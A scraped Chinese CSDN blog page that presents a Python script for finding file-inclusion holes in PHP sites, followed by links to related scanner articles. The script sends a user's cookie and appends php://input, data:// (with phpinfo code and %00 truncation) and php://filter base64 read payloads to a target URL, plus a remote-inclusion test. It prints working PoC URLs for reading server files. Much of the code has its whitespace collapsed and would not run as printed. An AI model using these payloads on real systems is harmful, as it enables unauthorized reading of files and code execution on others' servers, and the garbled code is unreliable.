python 漏洞扫描工具_python打造文件包含漏洞检测工具

最新推荐文章于 2023-09-13 20:00:00 发布
最新推荐文章于 2023-09-13 20:00:00 发布
阅读量400 收藏 2
点赞数
文章标签: python 漏洞扫描工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39604189/article/details/111419833
版权
该博客介绍了一个利用Python编写的漏洞扫描工具,用于检测PHP环境中的文件包含漏洞。用户输入目标URL、要读取的文件和Cookie信息,工具通过发送不同类型的请求来检查php://input、data://协议以及php://filter资源是否支持,从而判断是否存在漏洞。如果检测到支持的协议,将输出相应的POC(Proof of Concept)。
摘要由CSDN通过智能技术生成

importrequestsimportthreadingimportosimporttimeimportsys

cookies={}

urls=input('Please enter the target:')

user=input('Enter the file you want to read:')

user2=input('Enter your cookie:')for lie in user2.split(';'):

key,value=lie.split('=',1)

cookies[key]=value

payload='php://input'payload2='data:text/plain,<?php phpinfo();?>%00'payload2s='data:text/plain,<?php phpinfo();?>'payload3='php://filter/read=convert.base64-encode/resource={}'.format(user)

error=['404','Not Found','Warning','不存在','找不到','防火墙','安全狗','云锁']defexploitone(user):

headers={'user-agent':'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)'}

url=user

pocone=url+payload

poctwo=url+payload2

pocsan=url+payload3

pocsi=url+payload2s

request=requests.get(url=pocone,headers=headers,cookies=cookies)

request2=requests.get(url=poctwo,headers=headers,cookies=cookies)

request3=requests.get(url=pocsan,headers=headers,cookies=cookies)

request4=requests.get(url=pocsi,headers=headers,cookies=cookies)

ok=[]for e inerror:if request.status_code==200:if e instr(request.text):print('[-]Php://input protocol does not support')else:

ok.append('[+]Support php://input protocol Poc:{}'.format(request.url))if request2.status_code==200:if e instr(request2.text):print('[-]Data:// protocol that does not support%00 truncation')else:

ok.append('[+]Data:// protocol that supports%00 truncation Poc2:{}'.format(request2.url))if request3.status_code==200:if e instr(request3.text):print('[-]Do not support the use of php://filter/read=convert.base64-encode/resource=')else:

ok.append('[+]Support php://filter/read=convert.base64-encode/resource= Poc3:{}'.format(request3.url))if request4.status_code==200:if e instr(request4.text):print('[-]Data:// protocol does not support')else:

ok.append('[+]Support with data:// protocol Poc4:{}'.format(request4.url))if len(ok)>0:

v=list(set(ok))for vv inv:print(vv)

exploitone(urls.rstrip())defexploittwo():

poc='http://www.baidu.com'url=urls.rstrip()+poc

headers={'user-agent':'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)'}

request2=requests.get(url=url,headers=headers,cookies=cookies)

yuan=[]for e inerror:if request2.status_code==200:if e instr(request2.text):print('[-]Remote inclusion failure')else:

yuan.append('[+]Allow remote inclusion poc:{}'.format(request2.url))if len(yuan)>0:

s=list(set(yuan))for b ins:print(b)

exploittwo()

weixin_39604189
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python实现漏洞扫描
06-05
漏洞扫描器分为端口扫描模块、SSH弱口令扫描模块及OS识别模块。 使用Python语言编程实现。 有CMD执行和图形界面执行两种操作方式。 用户输入目标设备的IP地址及扫描的端口号范围,根据需要选择要扫描的内容,系统依次进行扫描并最终将扫描结果汇总展现给用户。
python代码扫描工具_Python脚本实现Web漏洞扫描工具
weixin_39593354的博客
12-04 1494
这是去年毕设做的一个Web漏洞扫描工具,主要针对简单的SQL注入漏洞、SQL盲注和XSS漏洞,代码是看过github外国大神(听说是SMAP的编写者之一)的两个小工具源码,根据里面的思路自己写的。以下是使用说明和源代码。一、使用说明:1.运行环境:Linux命令行界面+Python2.72.程序源码:Vim scanner//建立一个名为scanner的文件Chmod a+xscanner//修...
Python脚本实现Web漏洞扫描工具
09-21
是去年毕设做的一个Web漏洞扫描工具,主要针对简单的SQL注入漏洞、SQL盲注和XSS漏洞。下文给大家介绍了使用说明和源代码,一起看看吧
python 漏洞扫描工具_基于Python3的漏洞检测工具
weixin_39530437的博客
12-10 736
Python3 漏洞检测工具 -- lancelance, a simple version of the vulnerability detection framework based on Python3.基于Python3的简单版漏洞检测框架 -- lance可以自定义poc或exp插件,可以指定要加载的poc或exp。代码已经上传到Github :https://github.com/b...
python3扫描_Python3漏洞扫描工具 ( Python3 插件式框架 )
weixin_39941262的博客
12-03 204
Python3 漏洞检测工具 -- lancelance, a simple version of the vulnerability detection framework based on Python3.基于Python3的简单版漏洞检测框架 -- lance可以自定义poc或exp插件,可以 指定 要加载的poc或exp。再次添加了logging模块来控制输出,同时也支持Linux平台的彩...
基于Python的Struts2安全漏洞扫描工具设计源码
04-09
Struts2安全漏洞扫描工具 - 基于Python开发,包含21个文件,如WAR、GITIGNORE、LICENSE、MD、PY、TXT和JSP等。该项目为用户提供了一个Struts2安全漏洞扫描工具,通过界面交互和功能模块,为用户提供了一个高效、易用...
基于Python的Struts2漏洞扫描工具设计源码
最新发布
05-23
Struts2-Scan是一个基于Python开发的Struts2漏洞扫描工具,包含21个文件,其中包括15个WAR文件、1个Git忽略文件、1个LICENSE文件、1个Markdown文件、1个Python源文件、1个文本文件和1个JSP文件。该项目旨在帮助用户...
基于Python的Struts2全漏洞扫描利用工具设计源码
05-22
Struts2全漏洞扫描利用工具设计源码:该项目基于Python开发,包含21个文件,主要使用Python语言。该工具旨在帮助开发者扫描并利用Struts2中的全漏洞,包括漏洞检测、漏洞利用等功能,以提高网络安全性和系统的安全性...
python打造文件包含漏洞检测工具
weixin_30296405的博客
06-17 275
0x00前言: 做Hack the box的题。感觉那个平台得开个VIp 不然得凉。一天只能重置一次。。。mmp 做的那题毒药是文件包含漏洞的题,涉及到了某个工具 看的不错就开发了一个。 0x01代码: import requests import threading import os import time import sys cookies={} urls=...
基于python漏洞扫描器_基于Python的Web漏洞扫描
weixin_34653945的博客
12-24 3090
基于Python的Web漏洞扫描器徐贵江;黄媛媛;陈子豪;殷旭东;钱振江【期刊名称】《软件工程师》【年(卷),期】2020(023)004【摘要】当下Web安全问题频发,很多Web网站代码设计时安全问题考虑不足,而市面上的漏洞扫描器存在扫描速度慢、软件臃肿、可扩展性不强等问题,我们基于Python设计了一个Web漏洞扫描器,在参考其他同类产品设计的基础上,采用注入分析、字典扫描等方法提高了扫描器性...
Durian:基于Python的代码检查工具,暂时支持一些简单的静态漏洞检查和基于clang对c系列语言解析为抽象语法树(抽象语法树)进行破坏性缺陷分析检查
03-23
[目录] 榴莲 0x01,简介(介绍) Durian工具是一个基于libclang的个性化代码检测工具。 1),忘记日志打印等异常明显的问题,可以通过正则表达式直接匹配出。可以通过xml文件添加匹配规则,针对不同类型的问题,进行不同的逻辑处理,如是否打印了日志,虚函数2),基于libclang,利用clang对C族语言进行词法分析和语法分析。将生成原始生成对应的AST,通过遍历AST来分析函数内部可能存在的变量重复赋值问题。 0x02,功能(特点) 多语言支持(支持多种开发语言) 支持C系列(基于libclang),JAVA,PHP,等开发语言以及伪代码检测,并支持数十种类型文件。 支持的多个漏洞(支持多个漏洞类型) 临时开放几条突破规则匹配,用户可以自定义,后续将继续更新。 CLI / API模式(命令行模式和API模式) 暂时提供CLI模式,用户可以自己添加API,WEB扩展。 0
漏洞扫描器源代码
11-15
Python开发的漏洞扫描器源代码,非常好用。。。。。。。
python判断含有某字符串的文件
08-07
输入某一文件夹(如‘'H:\\temp'’)和字符串(如‘Bmi’),将会输出该文件夹内含有该字符串的所有文件名程
python——脚本实现检测目标ip是否存在文件包含漏洞
记录并分享学习安全的知识点..
02-09 2683
举例dvwa——File Inclusion 代码如下: import requests import re url = input("请输入需要检测的网址:")#检测的地址 payload = "../" file_name = "phpinfo.php" #判断依据 header = { 'Cookie':'security=low; PHPSESSID=kvop1odoacus033sgu0rdl01et', 'User-Agent':'Mozilla/5.0 (Windows
python扫描app_几款python漏洞扫描工具
weixin_39557199的博客
11-23 618
【注意:此文章为博主原创文章!转载需注意,请带原文链接,至少也要是txt格式!】中间件漏洞检测框架(F-MiddlewareScan)纯python编写的轻量级中间件漏洞检测框架,实现针对中间件的自动化检测,端口探测->中间件识别->漏洞检测->获取webshell参数说明-h 必须输入的参数,支持ip(192.168.1.1),ip段(192.168.1),ip范围指定(192.168.1.1-...
Python代码扫描:企业级代码代码安全漏洞扫描Bandit
SteveRocket's-Blog
09-13 1656
我们可以根据报告中的建议来修复代码中的安全问题,以提高代码的质量和可靠性。在软件开发过程中,存在许多潜在的安全漏洞,为了及时发现和修复这些漏洞,我们需要使用专业的安全扫描工具,Bandit可以帮助我们检查代码中的潜在安全风险,如代码注入、XSS攻击、SQL注入和敏感信息泄露等。Bandit默认也不需要配置,如果我们需要根据自己的项目实际需求做一些配置,则可以通过一个名为bandit.yaml的配置文件,可以在项目根目录下创建该文件,并指定需要检查的规则和其他配置选项。打开首选项,然后导航到工具>外部工具
Python打造漏洞扫描器 10
oxuzhenyi的博客
05-26 6726
扫描器测试以及未来展望 一、实验简介 这是扫描器的最后一章,主要说说扫描器的使用方式以及对未来的展望。 二、扫描器测试 这个扫描器是python 2.7写的,开发在windows平台上,测试在linux上(实验楼的实验平台),经过测试,在这两个系统上都能够运行。 另外,只需要python安装两个库就可以。 在PIP上的安装指令 pip install reques
Python3漏洞扫描工具 ( Python3 插件式框架 )
weixin_30904593的博客
07-21 1016
目录 Python3 漏洞检测工具 -- lance screenshot requirements 关键代码 usage documents README Guide Change Log ...
python漏洞扫描工具
07-20
Python漏洞扫描工具是一种用Python语言编写的软件应用程序,旨在自动化检测和发现计算机系统、网络设备或软件应用程序中的安全漏洞。它可以帮助安全专业人员、系统管理员或企业保护其系统免受潜在的攻击和威胁。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值